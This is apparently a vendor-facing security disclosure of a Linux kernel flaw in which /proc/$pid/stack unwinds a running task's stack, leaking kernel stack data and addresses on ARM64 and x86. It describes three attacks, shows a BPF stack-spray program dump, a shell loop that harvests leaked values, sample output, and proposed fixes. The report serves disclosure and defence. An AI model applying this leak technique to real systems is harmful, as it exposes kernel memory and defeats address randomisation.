Linux: semi-arbitrary task stack read on ARM64 (and x86) via /proc/$pid/stack 


This issue probably had the most impact on ARM64 kernels before
commit e01e80634ecd ("fork: unconditionally clear stack on fork", first in
v4.17); luckily, that hardening patch was backported all the way to v4.4 (but
not v3.16), so most systems probably have that patch already.

On both ARM64 and x86, /proc/$pid/stack can be used to inspect the symbolized
kernel stack of a task that is concurrently executing on another CPU. (x86 has
a check, but that check is racy, and a comment also documents that it is racy.)
This means that the kernel can potentially attempt to unwind an active task
stack starting from an outdated frame pointer, causing the kernel to interpret
new stack contents (potentially user-supplied data) as a stack frame.

On both x86 and ARM64, the kernel ensures that only stack frames inside the
target's task stack area are dereferenced.
On x86, it is also ensured that only stack frames whose saved instruction
pointer points to some valid text section are printed; on ARM64, stack frames
are printed independent of where the saved instruction pointer points.
The format string element used for printing such stack traces is "%pB", which is
normally used for writing information about kernel crashes to the console; on
kernels with CONFIG_KALLSYMS, it is implemented by sprint_backtrace(), which
falls back to printing raw addresses with "0x%lx" when an address can't be
mapped to a symbol.
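
To illustrate that fallback, here is a minimal userspace sketch. The symbol
table, the names toy_sym and toy_sprint_backtrace(), and all addresses are
hypothetical; this is not the kernel's sprint_backtrace(), only a model of the
"symbol if known, raw address otherwise" behaviour described above.

```c
#include <assert.h>
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical symbol table entry; a real kernel consults kallsyms. */
struct toy_sym {
	uint64_t start;
	uint64_t size;
	const char *name;
};

/* Made-up symbols and addresses, for illustration only. */
static const struct toy_sym toy_syms[] = {
	{ 0x1000, 0x200, "toy_schedule" },
	{ 0x1200, 0x080, "toy_do_fork" },
};

/*
 * Format addr as "name+0xoff/0xsize" if it lies inside a known symbol,
 * otherwise fall back to printing the raw address.
 * Returns the snprintf() result.
 */
static int toy_sprint_backtrace(char *buf, size_t len, uint64_t addr)
{
	size_t i;

	assert(buf != NULL && len > 0);
	for (i = 0; i < sizeof(toy_syms) / sizeof(toy_syms[0]); i++) {
		const struct toy_sym *s = &toy_syms[i];

		if (addr >= s->start && addr - s->start < s->size)
			return snprintf(buf, len,
					"%s+0x%" PRIx64 "/0x%" PRIx64,
					s->name, addr - s->start, s->size);
	}
	/* No symbol covers addr: the raw value is printed verbatim. */
	return snprintf(buf, len, "0x%" PRIx64, addr);
}
```

In this model, an address inside a symbol comes back as a name plus offset, and
anything else (such as a data word read from the stack) comes back verbatim.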

On ARM64, the kernel ensures that stack frames are 16-byte-aligned.
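
The checks described above can be modelled roughly as follows. This is a
simplified userspace sketch, not the kernel's unwinder: struct toy_stack,
toy_unwind() and the addresses are hypothetical, and the only assumption taken
from the architecture is that a frame record is a 16-byte pair of saved frame
pointer (at fp) and saved instruction pointer (at fp + 8).

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Toy model of a task stack area (hypothetical layout). */
struct toy_stack {
	uint64_t base;         /* lowest address of the stack area */
	uint64_t size;         /* size in bytes, at least 16 */
	const uint64_t *words; /* backing storage, size / 8 entries */
};

/* True if a whole 16-byte frame record at fp lies inside the stack area. */
static bool toy_on_stack(const struct toy_stack *s, uint64_t fp)
{
	return fp >= s->base && fp - s->base <= s->size - 16;
}

static uint64_t toy_load(const struct toy_stack *s, uint64_t addr)
{
	return s->words[(addr - s->base) / 8];
}

/*
 * Walk frame records starting at fp and store each saved pc in out[].
 * The walk stops on a misaligned or off-stack fp, or after max_out entries.
 * As on ARM64 in the description above, the saved pc itself is not checked.
 */
static size_t toy_unwind(const struct toy_stack *s, uint64_t fp,
			 uint64_t *out, size_t max_out)
{
	size_t n = 0;

	assert(s->size >= 16);
	while (n < max_out && (fp & 0xf) == 0 && toy_on_stack(s, fp)) {
		out[n++] = toy_load(s, fp + 8); /* saved pc */
		fp = toy_load(s, fp);           /* next frame pointer */
	}
	return n;
}
```

Neither check looks at what the record contains, so if the starting fp is stale
and the memory behind it has been overwritten, whatever now sits at fp + 8 is
reported as a return address.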

This leads to three potential attacks:

1. An attacker can fake a stack frame with a controlled fake instruction pointer
   and observe to which symbol the kernel maps it. This could be used both to
   break kernel text ASLR and (if the attacker doesn't have access to the kernel
   image anyway) to gain more fine-grained information about the layout of
   kernel code.
2. An attacker can fake a stack frame that points to an arbitrary location in
   the task stack (subject to alignment constraints) in order to leak data
   stored at that address into the stack trace returned to userspace.
   (This is more practical on ARM64, but might also work on x86 if you only need
   to leak one byte at a time.)
3. A DoS that is, from my perspective, relatively boring: it looks as if
   building a loop out of stack frames whose saved instruction pointers point
   into scheduler code will send the task that is attempting to read
   /proc/$pid/stack into an endless loop.
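
The alignment constraint in attack 2 can be worked through with a small
sketch. It assumes the ARM64 frame record layout (saved frame pointer at fp,
saved instruction pointer at fp + 8) and the 16-byte alignment rule mentioned
above; the helper name fake_fp_for_slot() is hypothetical and is not taken
from the PoC.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Given the address of an 8-byte stack slot that should be leaked, compute
 * the fake frame pointer that places the slot in the "saved pc" position
 * (fp + 8). Returns false if the resulting fp would not be 16-byte-aligned,
 * in which case the slot can't be leaked directly this way.
 */
static bool fake_fp_for_slot(uint64_t slot_addr, uint64_t *fake_fp)
{
	uint64_t fp = slot_addr - 8;

	assert(fake_fp != NULL);
	if (fp & 0xf)
		return false;
	*fake_fp = fp;
	return true;
}
```

Only slots at addresses congruent to 8 modulo 16 qualify. Assuming the leaked
value 0xffffff800e5cbb78 in the sample output below is r10, the slot written
by "*(u64 *)(r10 -16) = r10" is at 0xffffff800e5cbb68, and the helper yields
0xffffff800e5cbb60, which is r10 - 24. That matches the value the BPF program
computes in r1 and sprays as the fake frame pointer.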

I have written a PoC for attack 2 and tested it on a Raspberry Pi 3, using a
custom 64-bit build of the Raspberry Pi kernel (based on 4.18.y) with
CONFIG_BPF_SYSCALL manually enabled (because I'm too lazy to search for a more
normal way to spray things on the kernel stack in the right places), built with
gcc 7.2.0. I have attached the PoC as pipe_read.c. The PoC leaks the BPF frame
pointer.

Usage:

In terminal 1:
==============
pi@raspberrypi:~/stack_dump$ gcc -o pipe_read pipe_read.c -pthread && ./pipe_read
==========================
0: (18) r0 = 0xbadbeefbadbeef00
2: (bf) r1 = r10
3: (07) r1 += -24
4: (7b) *(u64 *)(r10 -16) = r10
5: (7b) *(u64 *)(r10 -40) = r1
6: (7b) *(u64 *)(r10 -48) = r0
7: (7b) *(u64 *)(r10 -56) = r1
8: (7b) *(u64 *)(r10 -64) = r0
9: (7b) *(u64 *)(r10 -72) = r1
10: (7b) *(u64 *)(r10 -80) = r0
11: (7b) *(u64 *)(r10 -88) = r1
12: (7b) *(u64 *)(r10 -96) = r0
13: (7b) *(u64 *)(r10 -104) = r1
14: (7b) *(u64 *)(r10 -112) = r0
15: (7b) *(u64 *)(r10 -120) = r1
16: (7b) *(u64 *)(r10 -128) = r0
17: (7b) *(u64 *)(r10 -136) = r1
18: (7b) *(u64 *)(r10 -144) = r0
19: (7b) *(u64 *)(r10 -152) = r1
20: (7b) *(u64 *)(r10 -160) = r0
21: (7b) *(u64 *)(r10 -168) = r1
22: (7b) *(u64 *)(r10 -176) = r0
23: (7b) *(u64 *)(r10 -184) = r1
24: (7b) *(u64 *)(r10 -192) = r0
25: (7b) *(u64 *)(r10 -200) = r1
26: (7b) *(u64 *)(r10 -208) = r0
27: (7b) *(u64 *)(r10 -216) = r1
[...]
1920: (7b) *(u64 *)(r10 -480) = r0
1921: (7b) *(u64 *)(r10 -488) = r1
1922: (7b) *(u64 *)(r10 -496) = r0
1923: (7b) *(u64 *)(r10 -504) = r1
1924: (7b) *(u64 *)(r10 -512) = r0
1925: (b7) r0 = 0
1926: (95) exit
processed 1926 insns (limit 131072), stack depth 512
==========================
==============

In terminal 2:
==============
$ while true; do cat /proc/$(pgrep pipe_read)/stack; done |grep -A1 badbeef
[...]
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffffdf36987000
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffffdf36987000
[...]
==============

In terminal 3 (note that this requires kernel.kptr_restrict==1; with
kptr_restrict=0, garbage is printed):
==============
# grep _do_fork /proc/vmallocinfo | grep 0xffffff800e5c
0xffffff800e5c8000-0xffffff800e5cd000   20480 _do_fork+0xe8/0x420 pages=4 vmalloc
# 
==============


I'm not sure what the best fix for this is.

32-bit ARM is playing it safe and just refuses to print stack traces for
non-current tasks if CONFIG_SMP is on:
==============
	if (tsk != current) {
#ifdef CONFIG_SMP
		/*
		 * What guarantees do we have here that 'tsk' is not
		 * running on another CPU?  For now, ignore it as we
		 * can't guarantee we won't explode.
		 */
		if (trace->nr_entries < trace->max_entries)
			trace->entries[trace->nr_entries++] = ULONG_MAX;
		return;
#else
==============

With my "annoying security person" hat on: Would it make sense to just gate
proc_pid_stack() on file_ns_capable(m->file, &init_user_ns, CAP_SYS_ADMIN)?
That way, even if the unwind code gets some edgecase wrong, it won't cause the
disclosure of kernel memory to userspace.

If this code should continue to work without CAP_SYS_ADMIN, solving the issue is
probably not so straightforward...

One approach would be to fire an IPI to request that the target task dumps its
own stack.

Another approach might be to check, each time a pointer has been read from the
target's stack and before it is dereferenced, whether the target task has been
scheduled in the meantime. Perhaps by checking p->nvcsw, p->nivcsw and
p->on_cpu, if that works without races? The reason why I'd like to have more
than just one check at the end for this approach is (non-speculative) side
channels.
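
The shape of that idea, as a single-threaded userspace sketch: struct toy_task
and the helper names are hypothetical, only the field names nvcsw, nivcsw and
on_cpu come from the text above, and nothing here addresses the memory
ordering or race questions a real kernel implementation would have to answer.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Toy stand-in for the scheduler state named above. */
struct toy_task {
	unsigned long nvcsw;  /* voluntary context switch count */
	unsigned long nivcsw; /* involuntary context switch count */
	int on_cpu;           /* nonzero while the task is running */
};

struct toy_snapshot {
	unsigned long nvcsw;
	unsigned long nivcsw;
};

/* Record the counters; refuse if the task is running right now. */
static bool toy_snapshot_take(const struct toy_task *t, struct toy_snapshot *s)
{
	assert(t != NULL && s != NULL);
	if (t->on_cpu)
		return false;
	s->nvcsw = t->nvcsw;
	s->nivcsw = t->nivcsw;
	return true;
}

/* True if the task has not run since the snapshot was taken. */
static bool toy_still_valid(const struct toy_task *t,
			    const struct toy_snapshot *s)
{
	return !t->on_cpu && t->nvcsw == s->nvcsw && t->nivcsw == s->nivcsw;
}

/*
 * Read one stack slot, then re-validate before handing the value out, so
 * that a value read after the task ran is never used or dereferenced.
 */
static bool toy_read_checked(const struct toy_task *t,
			     const struct toy_snapshot *s,
			     const uint64_t *slot, uint64_t *val)
{
	uint64_t v = *slot;

	if (!toy_still_valid(t, s))
		return false;
	*val = v;
	return true;
}
```

An unwinder built on this would call toy_read_checked() for every frame
pointer and saved instruction pointer it loads and abort the whole trace on
the first failure, rather than validating once at the end.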


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.


Found by: jannh